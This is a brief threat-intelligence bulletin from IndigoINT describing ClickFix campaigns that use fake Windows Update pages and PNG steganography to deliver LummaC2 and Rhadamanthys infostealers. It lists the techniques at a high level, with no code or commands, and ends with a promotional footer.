Summary: New ClickFix variants use full-screen fake Windows Update pages to trick users into executing attacker-controlled CMD commands. Payloads (LummaC2, Rhadamanthys) are hidden inside PNG pixel data via steganography and reconstructed in memory using PowerShell + a .NET Stego Loader.
🔗 Additional Research (Huntress): https://www.huntress.com/blog/clickfix-malware-buried-in-images
🧩 Classification
Category: Malware / Social Engineering / Steganography / Infostealers
Verticals Impacted: Global
Type of Intel: 🛡️ Tactical | ⚡ Operational
Noted TTPs:
Fake Windows Update / human-verification pages
Clipboard-based execution
mshta.exe → malicious JavaScript
Multi-stage PowerShell loaders
.NET Stego Loader (PNG pixel-data steganography, AES encrypted)
Donut-packed shellcode
LummaC2 & Rhadamanthys delivery
Heavy function trampoline evasion (10k empty calls)
🛠 Final Notes
We write these for the analyst trying to triage 20 open tabs, the blue-teamer who needs to pivot fast, and the CISO who wants to understand why this matters without reading 3 emails or articles. If you’re one of them, you’re why we’re here.
We’ll be publishing deep-dive reports, enriched IOCs and more for paid members. Need a complete system to track threats and streamline your intelligence workflow 👉 Check out the IndigoINT Threat Intelligence Marketplace
❤️🔥 Remember, in the dark we are all the same. ❤️🔥
— Yasmine | IndigoINT
Appendix
n/a
📝 Disclaimer
IndigoINT may use AI tools to assist with formatting, grammar, and low-level analysis support. All content is reviewed by a human analyst and undergoes internal peer review to ensure accuracy and integrity.
You may see slight formatting changes in the first few months and content changes, please be patient with us as we find just the right fit!
